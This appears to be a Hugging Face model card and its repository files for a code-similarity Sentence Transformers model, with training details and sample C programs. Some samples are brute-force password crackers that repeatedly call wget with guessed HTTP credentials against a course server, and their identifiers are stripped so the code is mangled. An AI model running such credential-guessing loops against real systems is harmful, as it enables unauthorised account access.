'#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={\'a\',\'A\',\'b\',\'B\',\'c\',\'C\',\'d\',\'D\',\'e\',\'E\',\'f\',\'F\',\'g\',\'G\',\'h\',\'H\',\'i\',\'I\',\'j\',\'J\',\'k\',\'K\',\'l\',\'L\',\'m\',\'M\',\'n\',\'N\',\'o\',\'O\',\'p\',\'P\',\'q\',\'Q\',\'r\',\'R\',\'s\',\'S\',\'t\',\'T\',\'u\',\'U\',\'v\',\'V\',\'w\',\'W\',\'x\',\'X\',\'y\',\'Y\',\'z\',\'Z\'};\ntime_t u1,u2;\n\n (void) time(&u1); \n strcpy(temp1,"wget --http-user= --http-passwd=");\n strcpy(temp2," http://sec-crack.cs.rmit.edu./SEC/2/index.php");\n \n for(m=0;m<=51;m++)\n {\n v[0]=[m]; \n v[1]=\'\\0\';\n v[2]=\'\\0\';\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3); \n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n for(n=0;n<=51;n++)\n {\n v[0]=[m]; \n v[1]=[n];\n v[2]=\'\\0\';\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n for(o=0;o<=51;o++)\n { \n v[0]=[m]; \n v[1]=[n];\n v[2]=[o];\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) 
time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n \n \n }\n }\n } \n \n} \n',
|
498 |
+
]
|
499 |
+
embeddings = model.encode(sentences)
|
500 |
+
print(embeddings.shape)
|
501 |
+
# [3, 768]
|
502 |
+
|
503 |
+
# Get the similarity scores for the embeddings
|
504 |
+
similarities = model.similarity(embeddings, embeddings)
|
505 |
+
print(similarities)
|
506 |
+
# tensor([[1.0000, 0.9111, 0.9288],
|
507 |
+
# [0.9111, 1.0000, 0.9562],
|
508 |
+
# [0.9288, 0.9562, 1.0000]])
|
509 |
+
```
|
510 |
+
|
511 |
+
<!--
|
512 |
+
### Direct Usage (Transformers)
|
513 |
+
|
514 |
+
<details><summary>Click to see the direct usage in Transformers</summary>
|
515 |
+
|
516 |
+
</details>
|
517 |
+
-->
|
518 |
+
|
519 |
+
<!--
|
520 |
+
### Downstream Usage (Sentence Transformers)
|
521 |
+
|
522 |
+
You can finetune this model on your own dataset.
|
523 |
+
|
524 |
+
<details><summary>Click to expand</summary>
|
525 |
+
|
526 |
+
</details>
|
527 |
+
-->
|
528 |
+
|
529 |
+
<!--
|
530 |
+
### Out-of-Scope Use
|
531 |
+
|
532 |
+
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
|
533 |
+
-->
|
534 |
+
|
535 |
+
<!--
|
536 |
+
## Bias, Risks and Limitations
|
537 |
+
|
538 |
+
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
|
539 |
+
-->
|
540 |
+
|
541 |
+
<!--
|
542 |
+
### Recommendations
|
543 |
+
|
544 |
+
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
|
545 |
+
-->
|
546 |
+
|
547 |
+
## Training Details
|
548 |
+
|
549 |
+
### Training Dataset
|
550 |
+
|
551 |
+
#### Unnamed Dataset
|
552 |
+
|
553 |
+
* Size: 3,081 training samples
|
554 |
+
* Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
|
555 |
+
* Approximate statistics based on the first 1000 samples:
|
556 |
+
| | sentence_0 | sentence_1 | label |
|
557 |
+
|:--------|:--------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------|:-----------------------------------------------|
|
558 |
+
| type | string | string | int |
|
559 |
+
| details | <ul><li>min: 177 tokens</li><li>mean: 436.43 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 177 tokens</li><li>mean: 421.53 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.20%</li><li>1: ~0.80%</li></ul> |
|
560 |
+
* Samples:
|
561 |
+
| sentence_0 | sentence_1 | label |
|
562 |
+
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
|
563 |
+
| <code><br><br><br><br><br><br>#include <sys/stat.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/time.h><br><br>#define MSG_FILE "msg"<br>#define EMAIL_TO "@cs.rmit.edu."<br>#define TRUE 1<br>#define FALSE 0<br><br><br>void genLog(char *logFile, const char *URL);<br>void getPage(const char *URL, const char *fname);<br>int getCurTime();<br>int logDiff(const char *logFile, int time);<br>int isFileExist(const char *fname);<br>void sendMail(const char* emailTo, const char* subject, const char* msgFile<br> , const char* log);<br><br>int (int argc, char **argv)<br>{<br> int time_var;<br> char *URL;<br> int upTime = 0;<br> char logFile[256];<br> int logSent = FALSE;<br> char subject[256];<br> <br> if (argc != 3)<br> {<br> fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");<br> exit(1);<br> }<br> else<br> {<br> time_var = atoi(argv[2]);<br><br> URL = malloc(strlen(argv[1]));<br><br> if (URL)<br> {<br> for (;;) <br> {<br> if (((int)difftime(upTime, getCurTime()) % time_var == 0) <br> && !logSent)<br> {<br> strncpy(URL, argv[1], strlen(argv[1]));<br> genLog(logFile, URL);<br> ...</code> | <code>#include <string.h><br>#include <stdlib.h><br>#include <stdio.h><br>#include <fcntl.h><br>#include <unistd.h><br>#include <sys/wait.h><br>#include <sys/time.h><br><br><br><br>char* joinMe(char* t, char* t2)<br>{<br> char* result;<br> int length = 0;<br> int j = 0;<br> int counter = 0;<br> <br> length = strlen(t) + strlen(t2) + 1;<br> <br> result = malloc(sizeof(char) * length);<br> <br> <br> for(j = 0; j<strlen(t); j++)<br> {<br> result[j] = t[j];<br> }<br><br> <br> for(j = strlen(t); j<length; j++)<br> {<br> result[j] = t2[counter];<br> counter++;<br> }<br> <br> <br> result[length-1] = '\0';<br><br> return result;<br>}<br><br><br>void check(char** smallcmd)<br>{<br> int pid = 0;<br> int status;<br><br> <br> if( (pid = fork()) == 0)<br> {<br> <br> execvp(smallcmd[0],smallcmd);<br> }<br> else<br> {<br> <br> while(wait(&status) != 
pid);<br> }<br>}<br><br>int (void)<br>{<br> int i = 0, j = 0, k = 0;<br> char** smallcmd;<br> int count = 0;<br> FILE *myFile,*myFile2,*myFile3;<br> int compare1;<br> char* myString;<br> int length = 0;<br> int start1, end1;<br> <br> <br> myString = malloc(sizeof(char) * 100);<br> smallcmd = malloc(sizeof(char *) * 8);<br> <br> smallcmd[0] = "/usr/local//wget";<br> <br> smallcm...</code> | <code>0</code> |
|
564 |
+
| <code><br><br><br><br><br><br>#include <sys/stat.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/time.h><br><br>#define MSG_FILE "msg"<br>#define EMAIL_TO "@cs.rmit.edu."<br>#define TRUE 1<br>#define FALSE 0<br><br><br>void genLog(char *logFile, const char *URL);<br>void getPage(const char *URL, const char *fname);<br>int getCurTime();<br>int logDiff(const char *logFile, int time);<br>int isFileExist(const char *fname);<br>void sendMail(const char* emailTo, const char* subject, const char* msgFile<br> , const char* log);<br><br>int (int argc, char **argv)<br>{<br> int time_var;<br> char *URL;<br> int upTime = 0;<br> char logFile[256];<br> int logSent = FALSE;<br> char subject[256];<br> <br> if (argc != 3)<br> {<br> fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");<br> exit(1);<br> }<br> else<br> {<br> time_var = atoi(argv[2]);<br><br> URL = malloc(strlen(argv[1]));<br><br> if (URL)<br> {<br> for (;;) <br> {<br> if (((int)difftime(upTime, getCurTime()) % time_var == 0) <br> && !logSent)<br> {<br> strncpy(URL, argv[1], strlen(argv[1]));<br> genLog(logFile, URL);<br> ...</code> | <code>#include<stdio.h><br>#include<stdlib.h><br>#include <sys/types.h><br>#include <unistd.h><br>#include <sys/time.h><br><br>int ()<br>{<br> char lc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> char uc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> char gc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> int a=0,b=0,c=0,d,e,count=0;<br> char [100],temp1[100],temp2[100],temp3[100],temp4[10],temp5[50],p[100],q[50],r[50];<br> char result,result1,result2,mx[100],mx1,mx2,mx3,mx4;<br> <br> int ,end,t;<br> = time(); <br>while(sizeof(lc)!=52)<br>{<br> temp2[0]=lc[d];<br> temp2[1]='\0';<br> d=d+1;<br> strcpy(p,temp2);<br> <br> while(sizeof(uc)!=52)<br> {<br> temp3[0]=uc[b];<br> temp3[1]='\0';<br> b=b+1;<br> strcpy(q,p);<br> strcat(q,temp3);<br> for(e=0;e<52;e++)<br> {<br> temp1[0]=gc[e];<br> 
temp1[1]='\0';<br> strcpy(r,q);<br> strcat(r,temp1);<br> strcpy(mx,"wget http://sec-crack.cs.rmit.edu./SEC/2 --http-user= --http-passwd=");<br> strcat(mx,r);<br> printf("temp3=%s\n",mx);<br> if(sy...</code> | <code>0</code> |
|
565 |
+
| <code>#include<stdio.h><br>#include<stdlib.h><br>#include<unistd.h><br>#define TRUE 0<br>()<br>{<br>FILE *fp;<br>system("rmdir ./www.cs.rmit.edu.");<br>char chk[1];<br>strcpy(chk,"n");<br> while(1)<br> {<br> <br> system("wget -p http://www.cs.rmit.edu./students/");<br> <br> system("md5sum ./www.cs.rmit.edu./images/*.* > ./www.cs.rmit.edu./text1.txt");<br> <br> <br> if (strcmp(chk,"n")==0) <br> { <br> system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt");<br> system("mkdir ./");<br> <br> system("mv ./www.cs.rmit.edu./students/index.html ./");<br> }<br> else<br> {<br> <br> <br> system(" diff ./www.cs.rmit.edu./students/index.html .//index.html | mail @cs.rmit.edu. ");<br> system(" diff ./www.cs.rmit.edu./text1.txt ./text2.txt | mail @cs.rmit.edu. ");<br> system("mv ./www.cs.rmit.edu./students/index.html ./");<br> system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt"); <br> }<br> sleep(86400);<br> strcpy(chk,"y");<br> <br> }<br>} <br> <br> <br></code> | <code>#include <string.h><br>#include <stdlib.h><br>#include <stdio.h><br>#include <fcntl.h><br>#include <unistd.h><br>#include <sys/wait.h><br>#include <sys/time.h><br><br><br><br>void emptyFile(char* name)<br>{<br> FILE* myFile;<br> myFile = fopen(name,"w");<br> fclose(myFile);<br>}<br><br>int (void)<br>{<br> FILE* myFile;<br> char* myString;<br> <br> myString = malloc(sizeof(char ) * 100);<br><br> <br> <br> emptyFile(".old.html");<br> emptyFile(".new.html");<br><br> <br> system("wget -O .old.html -q http://www.cs.rmit.edu./students/");<br><br> while(1)<br> {<br> <br> emptyFile(".new.html");<br><br> <br> system("wget -O .new.html -q http://www.cs.rmit.edu./students/");<br> <br> <br> system("diff .old.html .new.html > watch.txt");<br><br> myFile = fopen("watch.txt","r");<br> if(myFile != (FILE*) NULL)<br> {<br> fgets(myString,100,myFile);<br> if(strlen(myString) > 0)<br> {<br> <br> <br> system("mail @cs.rmit.edu. 
< watch.txt");<br> <br> system("cp .new.html .old.html");<br> }<br> }<br> <br> sleep(60*60*24);<br> }<br> <br> return 1;<br>}<br><br><br></code> | <code>0</code> |
|
566 |
+
* Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss)
|
567 |
+
|
568 |
+
### Training Hyperparameters
|
569 |
+
#### Non-Default Hyperparameters
|
570 |
+
|
571 |
+
- `per_device_train_batch_size`: 16
|
572 |
+
- `per_device_eval_batch_size`: 16
|
573 |
+
- `num_train_epochs`: 1
|
574 |
+
- `fp16`: True
|
575 |
+
- `multi_dataset_batch_sampler`: round_robin
|
576 |
+
|
577 |
+
#### All Hyperparameters
|
578 |
+
<details><summary>Click to expand</summary>
|
579 |
+
|
580 |
+
- `overwrite_output_dir`: False
|
581 |
+
- `do_predict`: False
|
582 |
+
- `eval_strategy`: no
|
583 |
+
- `prediction_loss_only`: True
|
584 |
+
- `per_device_train_batch_size`: 16
|
585 |
+
- `per_device_eval_batch_size`: 16
|
586 |
+
- `per_gpu_train_batch_size`: None
|
587 |
+
- `per_gpu_eval_batch_size`: None
|
588 |
+
- `gradient_accumulation_steps`: 1
|
589 |
+
- `eval_accumulation_steps`: None
|
590 |
+
- `torch_empty_cache_steps`: None
|
591 |
+
- `learning_rate`: 5e-05
|
592 |
+
- `weight_decay`: 0.0
|
593 |
+
- `adam_beta1`: 0.9
|
594 |
+
- `adam_beta2`: 0.999
|
595 |
+
- `adam_epsilon`: 1e-08
|
596 |
+
- `max_grad_norm`: 1
|
597 |
+
- `num_train_epochs`: 1
|
598 |
+
- `max_steps`: -1
|
599 |
+
- `lr_scheduler_type`: linear
|
600 |
+
- `lr_scheduler_kwargs`: {}
|
601 |
+
- `warmup_ratio`: 0.0
|
602 |
+
- `warmup_steps`: 0
|
603 |
+
- `log_level`: passive
|
604 |
+
- `log_level_replica`: warning
|
605 |
+
- `log_on_each_node`: True
|
606 |
+
- `logging_nan_inf_filter`: True
|
607 |
+
- `save_safetensors`: True
|
608 |
+
- `save_on_each_node`: False
|
609 |
+
- `save_only_model`: False
|
610 |
+
- `restore_callback_states_from_checkpoint`: False
|
611 |
+
- `no_cuda`: False
|
612 |
+
- `use_cpu`: False
|
613 |
+
- `use_mps_device`: False
|
614 |
+
- `seed`: 42
|
615 |
+
- `data_seed`: None
|
616 |
+
- `jit_mode_eval`: False
|
617 |
+
- `use_ipex`: False
|
618 |
+
- `bf16`: False
|
619 |
+
- `fp16`: True
|
620 |
+
- `fp16_opt_level`: O1
|
621 |
+
- `half_precision_backend`: auto
|
622 |
+
- `bf16_full_eval`: False
|
623 |
+
- `fp16_full_eval`: False
|
624 |
+
- `tf32`: None
|
625 |
+
- `local_rank`: 0
|
626 |
+
- `ddp_backend`: None
|
627 |
+
- `tpu_num_cores`: None
|
628 |
+
- `tpu_metrics_debug`: False
|
629 |
+
- `debug`: []
|
630 |
+
- `dataloader_drop_last`: False
|
631 |
+
- `dataloader_num_workers`: 0
|
632 |
+
- `dataloader_prefetch_factor`: None
|
633 |
+
- `past_index`: -1
|
634 |
+
- `disable_tqdm`: False
|
635 |
+
- `remove_unused_columns`: True
|
636 |
+
- `label_names`: None
|
637 |
+
- `load_best_model_at_end`: False
|
638 |
+
- `ignore_data_skip`: False
|
639 |
+
- `fsdp`: []
|
640 |
+
- `fsdp_min_num_params`: 0
|
641 |
+
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
|
642 |
+
- `fsdp_transformer_layer_cls_to_wrap`: None
|
643 |
+
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
|
644 |
+
- `deepspeed`: None
|
645 |
+
- `label_smoothing_factor`: 0.0
|
646 |
+
- `optim`: adamw_torch
|
647 |
+
- `optim_args`: None
|
648 |
+
- `adafactor`: False
|
649 |
+
- `group_by_length`: False
|
650 |
+
- `length_column_name`: length
|
651 |
+
- `ddp_find_unused_parameters`: None
|
652 |
+
- `ddp_bucket_cap_mb`: None
|
653 |
+
- `ddp_broadcast_buffers`: False
|
654 |
+
- `dataloader_pin_memory`: True
|
655 |
+
- `dataloader_persistent_workers`: False
|
656 |
+
- `skip_memory_metrics`: True
|
657 |
+
- `use_legacy_prediction_loop`: False
|
658 |
+
- `push_to_hub`: False
|
659 |
+
- `resume_from_checkpoint`: None
|
660 |
+
- `hub_model_id`: None
|
661 |
+
- `hub_strategy`: every_save
|
662 |
+
- `hub_private_repo`: None
|
663 |
+
- `hub_always_push`: False
|
664 |
+
- `gradient_checkpointing`: False
|
665 |
+
- `gradient_checkpointing_kwargs`: None
|
666 |
+
- `include_inputs_for_metrics`: False
|
667 |
+
- `include_for_metrics`: []
|
668 |
+
- `eval_do_concat_batches`: True
|
669 |
+
- `fp16_backend`: auto
|
670 |
+
- `push_to_hub_model_id`: None
|
671 |
+
- `push_to_hub_organization`: None
|
672 |
+
- `mp_parameters`:
|
673 |
+
- `auto_find_batch_size`: False
|
674 |
+
- `full_determinism`: False
|
675 |
+
- `torchdynamo`: None
|
676 |
+
- `ray_scope`: last
|
677 |
+
- `ddp_timeout`: 1800
|
678 |
+
- `torch_compile`: False
|
679 |
+
- `torch_compile_backend`: None
|
680 |
+
- `torch_compile_mode`: None
|
681 |
+
- `include_tokens_per_second`: False
|
682 |
+
- `include_num_input_tokens_seen`: False
|
683 |
+
- `neftune_noise_alpha`: None
|
684 |
+
- `optim_target_modules`: None
|
685 |
+
- `batch_eval_metrics`: False
|
686 |
+
- `eval_on_start`: False
|
687 |
+
- `use_liger_kernel`: False
|
688 |
+
- `eval_use_gather_object`: False
|
689 |
+
- `average_tokens_across_devices`: False
|
690 |
+
- `prompts`: None
|
691 |
+
- `batch_sampler`: batch_sampler
|
692 |
+
- `multi_dataset_batch_sampler`: round_robin
|
693 |
+
- `router_mapping`: {}
|
694 |
+
- `learning_rate_mapping`: {}
|
695 |
+
|
696 |
+
</details>
|
697 |
+
|
698 |
+
### Framework Versions
|
699 |
+
- Python: 3.11.13
|
700 |
+
- Sentence Transformers: 5.0.0
|
701 |
+
- Transformers: 4.52.4
|
702 |
+
- PyTorch: 2.6.0+cu124
|
703 |
+
- Accelerate: 1.8.1
|
704 |
+
- Datasets: 3.6.0
|
705 |
+
- Tokenizers: 0.21.2
|
706 |
+
|
707 |
+
## Citation
|
708 |
+
|
709 |
+
### BibTeX
|
710 |
+
|
711 |
+
#### Sentence Transformers
|
712 |
+
```bibtex
|
713 |
+
@inproceedings{reimers-2019-sentence-bert,
|
714 |
+
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
|
715 |
+
author = "Reimers, Nils and Gurevych, Iryna",
|
716 |
+
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
|
717 |
+
month = "11",
|
718 |
+
year = "2019",
|
719 |
+
publisher = "Association for Computational Linguistics",
|
720 |
+
url = "https://arxiv.org/abs/1908.10084",
|
721 |
+
}
|
722 |
+
```
|
723 |
+
|
724 |
+
#### BatchAllTripletLoss
|
725 |
+
```bibtex
|
726 |
+
@misc{hermans2017defense,
|
727 |
+
title={In Defense of the Triplet Loss for Person Re-Identification},
|
728 |
+
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
|
729 |
+
year={2017},
|
730 |
+
eprint={1703.07737},
|
731 |
+
archivePrefix={arXiv},
|
732 |
+
primaryClass={cs.CV}
|
733 |
+
}
|
734 |
+
```
|
735 |
+
|
736 |
+
<!--
|
737 |
+
## Glossary
|
738 |
+
|
739 |
+
*Clearly define terms in order to be accessible across audiences.*
|
740 |
+
-->
|
741 |
+
|
742 |
+
<!--
|
743 |
+
## Model Card Authors
|
744 |
+
|
745 |
+
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
|
746 |
+
-->
|
747 |
+
|
748 |
+
<!--
|
749 |
+
## Model Card Contact
|
750 |
+
|
751 |
+
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
|
752 |
+
-->
|
config.json
ADDED
@@ -0,0 +1,28 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"architectures": [
|
3 |
+
"RobertaModel"
|
4 |
+
],
|
5 |
+
"attention_probs_dropout_prob": 0.1,
|
6 |
+
"bos_token_id": 0,
|
7 |
+
"classifier_dropout": null,
|
8 |
+
"eos_token_id": 2,
|
9 |
+
"gradient_checkpointing": false,
|
10 |
+
"hidden_act": "gelu",
|
11 |
+
"hidden_dropout_prob": 0.1,
|
12 |
+
"hidden_size": 768,
|
13 |
+
"initializer_range": 0.02,
|
14 |
+
"intermediate_size": 3072,
|
15 |
+
"layer_norm_eps": 1e-05,
|
16 |
+
"max_position_embeddings": 1026,
|
17 |
+
"model_type": "roberta",
|
18 |
+
"num_attention_heads": 12,
|
19 |
+
"num_hidden_layers": 12,
|
20 |
+
"output_past": true,
|
21 |
+
"pad_token_id": 1,
|
22 |
+
"position_embedding_type": "absolute",
|
23 |
+
"torch_dtype": "float32",
|
24 |
+
"transformers_version": "4.52.4",
|
25 |
+
"type_vocab_size": 10,
|
26 |
+
"use_cache": true,
|
27 |
+
"vocab_size": 50000
|
28 |
+
}
|
config_sentence_transformers.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"model_type": "SentenceTransformer",
|
3 |
+
"__version__": {
|
4 |
+
"sentence_transformers": "5.0.0",
|
5 |
+
"transformers": "4.52.4",
|
6 |
+
"pytorch": "2.6.0+cu124"
|
7 |
+
},
|
8 |
+
"prompts": {
|
9 |
+
"query": "",
|
10 |
+
"document": ""
|
11 |
+
},
|
12 |
+
"default_prompt_name": null,
|
13 |
+
"similarity_fn_name": "cosine"
|
14 |
+
}
|
merges.txt
ADDED
The diff for this file is too large to render.
See raw diff
|
|
model.safetensors
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:be7b8d948e440cb3335c05d316cf60f9173091cc1ce881990453f763299bcf06
|
3 |
+
size 499391344
|
modules.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
[
|
2 |
+
{
|
3 |
+
"idx": 0,
|
4 |
+
"name": "0",
|
5 |
+
"path": "",
|
6 |
+
"type": "sentence_transformers.models.Transformer"
|
7 |
+
},
|
8 |
+
{
|
9 |
+
"idx": 1,
|
10 |
+
"name": "1",
|
11 |
+
"path": "1_Pooling",
|
12 |
+
"type": "sentence_transformers.models.Pooling"
|
13 |
+
}
|
14 |
+
]
|
sentence_bert_config.json
ADDED
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"max_seq_length": 512,
|
3 |
+
"do_lower_case": false
|
4 |
+
}
|
special_tokens_map.json
ADDED
@@ -0,0 +1,51 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"bos_token": {
|
3 |
+
"content": "<s>",
|
4 |
+
"lstrip": false,
|
5 |
+
"normalized": true,
|
6 |
+
"rstrip": false,
|
7 |
+
"single_word": false
|
8 |
+
},
|
9 |
+
"cls_token": {
|
10 |
+
"content": "<s>",
|
11 |
+
"lstrip": false,
|
12 |
+
"normalized": true,
|
13 |
+
"rstrip": false,
|
14 |
+
"single_word": false
|
15 |
+
},
|
16 |
+
"eos_token": {
|
17 |
+
"content": "</s>",
|
18 |
+
"lstrip": false,
|
19 |
+
"normalized": true,
|
20 |
+
"rstrip": false,
|
21 |
+
"single_word": false
|
22 |
+
},
|
23 |
+
"mask_token": {
|
24 |
+
"content": "<mask>",
|
25 |
+
"lstrip": true,
|
26 |
+
"normalized": true,
|
27 |
+
"rstrip": false,
|
28 |
+
"single_word": false
|
29 |
+
},
|
30 |
+
"pad_token": {
|
31 |
+
"content": "<pad>",
|
32 |
+
"lstrip": false,
|
33 |
+
"normalized": true,
|
34 |
+
"rstrip": false,
|
35 |
+
"single_word": false
|
36 |
+
},
|
37 |
+
"sep_token": {
|
38 |
+
"content": "</s>",
|
39 |
+
"lstrip": false,
|
40 |
+
"normalized": true,
|
41 |
+
"rstrip": false,
|
42 |
+
"single_word": false
|
43 |
+
},
|
44 |
+
"unk_token": {
|
45 |
+
"content": "<unk>",
|
46 |
+
"lstrip": false,
|
47 |
+
"normalized": true,
|
48 |
+
"rstrip": false,
|
49 |
+
"single_word": false
|
50 |
+
}
|
51 |
+
}
|
tokenizer.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|
tokenizer_config.json
ADDED
@@ -0,0 +1,58 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"add_prefix_space": false,
|
3 |
+
"added_tokens_decoder": {
|
4 |
+
"0": {
|
5 |
+
"content": "<s>",
|
6 |
+
"lstrip": false,
|
7 |
+
"normalized": true,
|
8 |
+
"rstrip": false,
|
9 |
+
"single_word": false,
|
10 |
+
"special": true
|
11 |
+
},
|
12 |
+
"1": {
|
13 |
+
"content": "<pad>",
|
14 |
+
"lstrip": false,
|
15 |
+
"normalized": true,
|
16 |
+
"rstrip": false,
|
17 |
+
"single_word": false,
|
18 |
+
"special": true
|
19 |
+
},
|
20 |
+
"2": {
|
21 |
+
"content": "</s>",
|
22 |
+
"lstrip": false,
|
23 |
+
"normalized": true,
|
24 |
+
"rstrip": false,
|
25 |
+
"single_word": false,
|
26 |
+
"special": true
|
27 |
+
},
|
28 |
+
"3": {
|
29 |
+
"content": "<unk>",
|
30 |
+
"lstrip": false,
|
31 |
+
"normalized": true,
|
32 |
+
"rstrip": false,
|
33 |
+
"single_word": false,
|
34 |
+
"special": true
|
35 |
+
},
|
36 |
+
"4": {
|
37 |
+
"content": "<mask>",
|
38 |
+
"lstrip": true,
|
39 |
+
"normalized": true,
|
40 |
+
"rstrip": false,
|
41 |
+
"single_word": false,
|
42 |
+
"special": true
|
43 |
+
}
|
44 |
+
},
|
45 |
+
"bos_token": "<s>",
|
46 |
+
"clean_up_tokenization_spaces": false,
|
47 |
+
"cls_token": "<s>",
|
48 |
+
"eos_token": "</s>",
|
49 |
+
"errors": "replace",
|
50 |
+
"extra_special_tokens": {},
|
51 |
+
"mask_token": "<mask>",
|
52 |
+
"model_max_length": 512,
|
53 |
+
"pad_token": "<pad>",
|
54 |
+
"sep_token": "</s>",
|
55 |
+
"tokenizer_class": "RobertaTokenizer",
|
56 |
+
"trim_offsets": true,
|
57 |
+
"unk_token": "<unk>"
|
58 |
+
}
|
vocab.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|